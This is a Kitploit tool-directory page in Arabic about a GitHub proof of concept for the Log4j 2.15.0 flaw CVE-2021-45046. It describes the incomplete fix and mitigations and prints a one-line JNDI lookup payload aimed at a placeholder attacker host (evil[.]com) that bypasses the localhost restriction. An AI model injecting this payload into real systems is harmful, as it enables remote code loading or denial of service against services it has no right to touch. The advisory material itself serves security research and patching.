Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4j_CVE-2021-45046 — Log4j 2.15.0 تصعيد الصلاحيات -- CVE-2021-45046 | Kitploit
أدوات/GitHubGitHub/cckuailong/log4j_cve-2021-45046
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubcckuailong/log4j_cve-2021-45046

Log4j_CVE-2021-45046

Log4j 2.15.0 تصعيد الصلاحيات -- CVE-2021-45046

عرض المستودع
2278منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تصعيد الامتياز في Log4j 2.15.0 -- CVE-2021-45046

هجوم

الوصف

تم اكتشاف أن الإصلاح الذي تم تطبيقه لمعالجة CVE-2021-44228 في Apache Log4j 2.15.0 كان غير مكتمل في بعض التكوينات غير الافتراضية. وهذا قد يسمح للمهاجمين الذين يسيطرون على بيانات إدخال Thread Context Map (MDC) عند استخدام تكوين تسجيل بتنسيق Pattern Layout غير افتراضي مع Context Lookup (على سبيل المثال، $${ctx:loginId}) أو نمط Thread Context Map (%X, %mdc, أو %MDC) لصياغة بيانات إدخال ضارة باستخدام نمط JNDI Lookup مما يؤدي إلى هجوم حرمان من الخدمة (DOS). يحد Log4j 2.15.0 من عمليات بحث JNDI LDAP إلى المضيف المحلي (localhost) بشكل افتراضي. لاحظ أن التخفيفات السابقة التي تتضمن تكوينًا مثل تعيين خاصية النظام log4j2.noFormatMsgLookup إلى true لا تخفف من هذه الثغرة المحددة. يعمل Log4j 2.16.0 على إصلاح هذه المشكلة عن طريق إزالة دعم أنماط بحث الرسائل وتعطيل وظيفة JNDI بشكل افتراضي. يمكن تخفيف هذه المشكلة في الإصدارات السابقة (<2.16.0) عن طريق إزالة فئة JndiLookup من مسار الفئة (مثال: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

cvss 3.7 -> 9

Poc

root@kitploit:~
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}

موضوع Log4shell

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

مرحباً بمساهمتك في reapoc

https://github.com/cckuailong/reapoc

تنزيل الأداة